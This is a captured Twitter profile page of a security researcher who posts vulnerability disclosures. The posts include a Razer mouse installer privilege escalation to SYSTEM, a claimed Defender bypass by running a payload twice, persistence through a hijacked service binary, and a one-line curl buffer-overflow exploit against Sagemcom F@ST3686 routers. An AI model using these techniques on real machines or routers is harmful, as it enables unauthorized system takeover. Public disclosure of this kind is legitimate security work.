Opens profile photo
Follow
jonhat
@j0nh4t
while true;do eat;sleep;hack;game;done
In memoryJoined May 2017

jonhat’s Tweets

Pinned Tweet
Need local admin and have physical access? - Plug a Razer mouse (or the dongle) - Windows Update will download and execute RazerInstaller as SYSTEM - Abuse elevated Explorer to open Powershell with Shift+Right click Tried contacting , but no answers. So here's a freebie
Embedded video
1:23
445.7K views
276
13.8K
Show this thread

Topics to follow

Sign up to get Tweets about the Topics you follow in your Home timeline.

Carousel

"YARA rule match shows CobaltStrike beacon in svchost.exe process memory" Analyst: "I've checked the hash of the executable on Virustotal and it said <trusted>." Me:
Nervous GIF
GIF
30
623
Bypass defender with Powershell? Run the same payload twice, yeah, you did read that correctly. Watch. 🙃
Embedded video
1:30
24.8K views
Quote Tweet
Okay?? just stumbled into this LIVE during my steam (twitch.tv/flangvik/). If you run a PowerShell payload that gets nuked by Defender (Say an AMSI bypass), and you open a new PowerShell prompt and run it again defender will ignore it? Multiple viewers confirmed...
15
842
Show this thread
The Razer & SteelSeries Windows PrivEsc vulns are fun, but there are tons of devices that may be vulnerable. We have a list of ~2500 possible devices! The easiest way to test is to use something like an OMG Cable or BashBunny to spoof the VID/PID. 1/n
8
646
Show this thread
I would like to update that I have been reached out by and ensured that their security team is working on a fix ASAP. Their manner of communication has been professional and I have even been offered a bounty even though publicly disclosing this issue.
19
1,152
Show this thread
Additionally if you go through the installation process and define the save dir to user controllable path like Desktop. A service binary is saved there which can be hijacked for persistance and is executed before user logon on boot.
4
707
Show this thread
Sagemcom F@ST3686 buf overflow. Reported 4 months ago, no fix. Mitigate by changing default IPs & remote management off. p=$(python -c 'print("A"*69)');curl --data "foo" http://192.168.1.1/goform/login?sessionKey=$p Anything over 68 chars overflows, I named it SESSION69 :D
Embedded video
0:55
1.5K views
2
26